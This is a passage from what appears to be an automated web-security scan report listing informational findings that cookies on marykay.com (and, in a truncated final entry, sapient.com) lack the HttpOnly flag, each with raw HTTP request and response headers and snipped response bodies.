GET /Themes/TabMenu/tabs.js HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 14231 Content-Type: application/x-javascript Last-Modified: Wed, 06 Apr 2011 17:12:28 GMT Accept-Ranges: bytes ETag: "0a655ce7df4cb1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=A5B951464DDB4DF25E342EB344BDA973; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:45 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ var delay = 1000; var seltab = null; var prevtab = null; function tabs_init(id) { seltab = document.getElementById(id); showTab(seltab, false); } function hideMenu(menu) { if (menu != nul...[SNIP]...
13.244. http://www.marykay.com/content/HPflash/portfolio_mk.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/content/HPflash/portfolio_mk.xml
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=19C9D0014D75852EFB8C9087C106B6A5; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:53 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /content/HPflash/portfolio_mk.xml HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 316 Content-Type: text/xml Last-Modified: Wed, 31 Aug 2011 14:47:25 GMT Accept-Ranges: bytes ETag: "8bceaae5ec67cc1:d825c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=19C9D0014D75852EFB8C9087C106B6A5; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:52 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:53 GMT; path=/ <?xml version="1.0" ?> <portfolio> <picture thumb = "/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg"/> <picture thumb = "/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg"/> <picture thumb = "/CONTE...[SNIP]...
13.245. http://www.marykay.com/content/hpflash/stage.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/content/hpflash/stage.swf
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=9326E0864457B586C81FDD8CE24A23E5; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /content/hpflash/stage.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 41607 Content-Type: application/x-shockwave-flash Last-Modified: Fri, 03 Jun 2011 15:46:18 GMT Accept-Ranges: bytes ETag: "a318661522cc1:d8265" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=9326E0864457B586C81FDD8CE24A23E5; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:50 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/ CWS..i..x...wTS..(<IH..1T..@..t.I..$...(J7A......%... .!tAQ..("(.X "*6., v. ......w....?..u....={f~.M......P..@.....q@OLL..-F.>.......:.....`=3j.[X.....8`.)..`o4j.X.....e.^....".ak.....`....QA...o......[SNIP]...
13.246. http://www.marykay.com/default.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/default.aspx
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:ConsultantContactID=-9223372036854775808; path=/ TLTHID=A79DE10345855E54FDA05590CB54614B; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.aspx?pid=mk HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Subsidiary=US; TLTHID=DFDB2FDD45BA94FC283A74BD7C3CBF64; TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Cache-Control: private Date: Tue, 06 Sep 2011 16:45:46 GMT Content-Type: text/html; charset=utf-8 Content-Language: en Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Set-Cookie: Subsidiary=US; path=/ Set-Cookie: PreviousMoniker=; path=/ Set-Cookie: Moniker=; path=/Set-Cookie: ConsultantContactID=-9223372036854775808; path=/ Set-Cookie: TLTHID=A79DE10345855E54FDA05590CB54614B; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Vary: Accept-EncodingSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ Content-Length: 36830 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN" > <html> <head><meta name="title" content="Mary Kay... Find your way to beautiful!" /><link id="Link1" rel="image_src" href="http://w...[SNIP]...
13.247. http://www.marykay.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/favicon.ico
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=43433491401355FE92B1C286F65FC316; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /favicon.ico HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=921B020F47FD8A57A88269A775E750F4; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 318 Content-Type: image/x-icon Last-Modified: Wed, 06 Apr 2011 17:12:18 GMT Accept-Ranges: bytes ETag: "b9ed3c87df4cb1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=43433491401355FE92B1C286F65FC316; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:57 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/ ..............(.......(....... ....................................3...f...f...........................$...........\......m...wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwEwWtgEwFDu.rw4sWds%bwDDwtBtDwAGwt....[SNIP]...
13.248. http://www.marykay.com/images/fflogo.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/fflogo.jpg
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=BCE7DC82466E2D42565B29A3B3C4E9C6; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/fflogo.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1665 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "8b6f46621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=BCE7DC82466E2D42565B29A3B3C4E9C6; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:48 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ............................................................................................................J.....[SNIP]...
13.249. http://www.marykay.com/images/icn_ec.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/icn_ec.jpg
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=242A48734AE8C90326B538806CDF19D0; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/icn_ec.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1712 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "17d0446621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=242A48734AE8C90326B538806CDF19D0; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:48 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ..........................................................................................................$.Z.....[SNIP]...
13.250. http://www.marykay.com/images/icn_fb.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/icn_fb.jpg
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=8AA5E3834817F20E05D692A6C10BEF9D; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/icn_fb.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1769 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "bbc506621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=8AA5E3834817F20E05D692A6C10BEF9D; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:48 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ .PNG . ...IHDR...z...$........4....gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<...{IDAThC.Z.oTE...mL0!.?@q%.*... H"./h.W..D..l..}hY.(R............D....1-,&m.~....g......Z......3gf................[SNIP]...
13.251. http://www.marykay.com/images/icn_pbp.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/icn_pbp.jpg
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=171587244A3CE521A7BA37AE883107B1; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/icn_pbp.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 2351 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "d380556621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=171587244A3CE521A7BA37AE883107B1; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:49 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ ......JFIF.....`.`.....4Exif..II*.......1...............Adobe ImageReady.....C........... . ................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222...[SNIP]...
13.252. http://www.marykay.com/images/icn_vmo.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/icn_vmo.jpg
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=1DB2B50F43E3F4D03BDF68AE8CA2AE7C; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/icn_vmo.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1933 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "8f31666621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=1DB2B50F43E3F4D03BDF68AE8CA2AE7C; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:49 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ..........................................................................................................$.......[SNIP]...
13.253. http://www.marykay.com/images/icn_yt.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/icn_yt.jpg
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=34430B6646F0AFCCDB0A7A9022E2E592; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/icn_yt.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 3367 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "7797e6621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=34430B6646F0AFCCDB0A7A9022E2E592; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:48 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ .PNG . ...IHDR.......$.....%..g....gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<....IDAThC.ZyPU..O.n..E.Z.4...Z..2j..L HQ.L.&...d...hTp#U.......S.4..`*..Z1.7.....Ux..... ..=..}..<.F.=s..s.=.......[SNIP]...
13.254. http://www.marykay.com/images/ielogo.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/ielogo.jpg
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=228F4B284CAFE25E42ECD3B80A8FB732; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/ielogo.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1740 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:25 GMT Accept-Ranges: bytes ETag: "cf578c6621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=228F4B284CAFE25E42ECD3B80A8FB732; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:47 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ............................................................................................................J.....[SNIP]...
13.255. http://www.marykay.com/images/searchbutton.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/searchbutton.gif
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=F0C410BF4DA1CA468842AA86BA246468; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/searchbutton.gif HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 239 Content-Type: image/gif Last-Modified: Wed, 06 Apr 2011 17:12:22 GMT Accept-Ranges: bytes ETag: "99f3fcca7df4cb1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=F0C410BF4DA1CA468842AA86BA246468; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:47 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ GIF89a......~OL~PN|ON...?++...............C.-@++B,,@,+~PL......|OL.ON.PO~ON....PN...........................!.......,.........l.d.V9.V...9...`t]...co..%Z.q..^4...1.|.....Mh.)...d. .T:m.(.,.|.$.l.$.....[SNIP]...
13.256. http://www.marykay.com/scripts/i2a.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/scripts/i2a.js
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:TLTHID=F487BB6C456B8904C272E490A0B8A392; Path=/; Domain=.marykay.com www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /scripts/i2a.js HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1848 Content-Type: application/x-javascript Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT Accept-Ranges: bytes ETag: "80e28bcc7df4cb1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=F487BB6C456B8904C272E490A0B8A392; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:47 GMTSet-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ var io = new Image(); var pageAction, price, sku, order_code, currency_id, user_defined1, user_defined2, user_defined3, user_defined4, ic_cat, ic_bu, ic_bc, ic_ch, ic_nso, altid, ic_type, urlA, prefi...[SNIP]...
13.257. http://www.sapient.com/en-us/about-sapient/alliances.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sapient.com
Path:
/en-us/about-sapient/alliances.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:locale=en-us; expires=Fri, 16-Sep-2011 15:37:20 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
